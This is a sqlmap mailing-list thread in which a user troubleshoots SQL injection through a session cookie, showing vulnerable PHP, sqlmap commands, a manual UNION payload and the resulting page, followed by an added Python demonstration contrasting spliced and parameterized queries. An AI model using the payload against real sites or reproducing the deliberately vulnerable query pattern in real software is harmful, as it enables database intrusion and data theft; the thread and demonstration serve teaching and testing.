Hi,

This is the HTML from a manual request with the sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20

<html>
 <head>
<link rel='stylesheet' href='css/styles.css'/>
  <title>My Account - Customer Care Centre - Acme Power Co</title>
 </head>
 <body>

<div id='heading'>
</div>

  <div id='menu'>
    <a href='index.php'>Home / Login</a> -
    <a href='account.php'>My Account</a> -
    <a href='support.php'>Contact Support</a> -
<a href='#'
onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
Opening Hours</a> -
    <a href='logout.php'>Logout</a>;
   </div>


  <div id='content'>
<div id='billz'>
Hi, 2!<br><br> Have a token: 86a2aeef8813bfa37a354e8997c77388<br><br>Please
find below your account statement, released 04 November 2011. This account
is due to be paid on <b>05 November 2011</b>. Failure to pay this amount
before the due date may result in service disruption.<br><br><h3>Account
Statement</h3><hr><table><tr><td width=200>Account Number</td><td
width=450>Description of
Service</td><td>Amount</td></tr></table><hr><table><tr><td
width=200>1</td><td width=450>Basic Power
Service</td><td>4</td></tr></table>
</div>
  </div>

 </body>
</html>

---------------------------

The relevant bits being "Hi, 2" and the table showing an amount of "4", etc.

Thanks,
ss23

On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:

> Hi Stephen.
>
> From this traffic file it's not really clear if this is exploitable by any
> means more than time-based.
>
> Could you please send the response you get when you "manually exploit" it
> with the payload you've mentioned:
> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <s...@ss23.geek.nz> wrote:
>
>> It ran a little over and started testing User-Agent, but it has the
>> entire log for the session cookie there.
>> The options I used this time were:
>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>> -t traffic.txt --level=5
>>
>> Thanks,
>> ss23
>>
>>
>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>> miroslav.stam...@gmail.com> wrote:
>>
>>> Hi.
>>>
>>> In that case could you please send the sqlmap traffic file got by using
>>> -t traffic.txt along with your standard switches/options?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <s...@ss23.geek.nz> wrote:
>>>
>>>> Hi,
>>>>
>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>> the cookie was being used. In the real script, there was no parse error.
>>>> Nonetheless, sqlmap cannot pull out results.
>>>>
>>>> Thanks
>>>> ss23
>>>>
>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>> miroslav.stam...@gmail.com> wrote:
>>>>
>>>>> Hi.
>>>>>
>>>>> I am not sure how you are "definitely able to pull out
>>>>> results", as I can see the problem lies in the PHP used (a pair of
>>>>> single quotes enclosed within another pair of single quotes):
>>>>>
>>>>> Bad:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>
>>>>> Good 1:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>
>>>>> Good 2:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>
>>>>> With that code of yours you should get an ugly PHP error message:
>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>
>>>>> Also, you could take a look at similar case here [1].
>>>>>
>>>>> Kind regards,
>>>>> Miroslav Stampar
>>>>>
>>>>> [1]
>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>
>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <s...@ss23.geek.nz> wrote:
>>>>>
>>>>>> Hi all,
>>>>>>
>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>> coax it into getting it right.
>>>>>> The PHP source looks something like:
>>>>>>
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu 
>>>>>> WHERE
>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>
>>>>>> and then it displays the fields it pulled out.
>>>>>>
>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>> I'm definitely able to pull out results.
>>>>>>
>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>
>>>>>> Thanks,
>>>>>> ss23
>>>>>>
>>>>>>
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sqlmap-users@lists.sourceforge.net
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
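The query pattern this thread is about, rebuilt as an added example (not code from the thread or from sqlmap) so the difference between splicing the cookie into the SQL text and binding it as a parameter can be seen on the thread's own payload; note that Miroslav's "Good 1" and "Good 2" variants only cure the PHP parse error, the cookie still lands unescaped in the SQL. It uses an in-memory SQLite database with constructed rows standing in for the MySQL tables ccc_users and custdata; table and column names are taken from the thread, the sample data is invented.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the two tables the thread's query joins.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE ccc_users (userid INTEGER, sessionid TEXT);
        CREATE TABLE custdata (userid INTEGER, custname TEXT,
                               custemail TEXT, owing REAL);
        INSERT INTO ccc_users VALUES (7, 'abc123');
        INSERT INTO custdata VALUES (7, 'Alice', 'alice@example.com', 42.50);
    """)
    return con

# Same statement as in the PHP, up to the point where the cookie is inserted.
SELECT = ("SELECT userid, custname, custemail, owing FROM custdata AS cd "
          "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
          "WHERE sessionid = ")

def lookup_vulnerable(con: sqlite3.Connection, sesh: str) -> list:
    # Mirrors the PHP: the cookie value becomes part of the SQL text itself.
    return con.execute(SELECT + "'" + sesh + "')").fetchall()

def lookup_parameterized(con: sqlite3.Connection, sesh: str) -> list:
    # The SQL text is fixed; the cookie travels as a bound value only.
    return con.execute(SELECT + "?)", (sesh,)).fetchall()

# The cookie value from the thread, URL-decoded as the server would see it.
PAYLOAD = unquote("')%20UNION%20select%201,2,3,4%20--%20")

def demo() -> dict:
    con = build_db()
    return {
        # legitimate session: both variants return Alice's row
        "legit_vuln": lookup_vulnerable(con, "abc123"),
        "legit_param": lookup_parameterized(con, "abc123"),
        # payload: the spliced query closes the subquery, UNIONs in 1,2,3,4
        # and comments out the rest -> the "Hi, 2" / amount "4" seen in the HTML
        "payload_vuln": lookup_vulnerable(con, PAYLOAD),
        # bound parameter: it is just a session id that matches nothing
        "payload_param": lookup_parameterized(con, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```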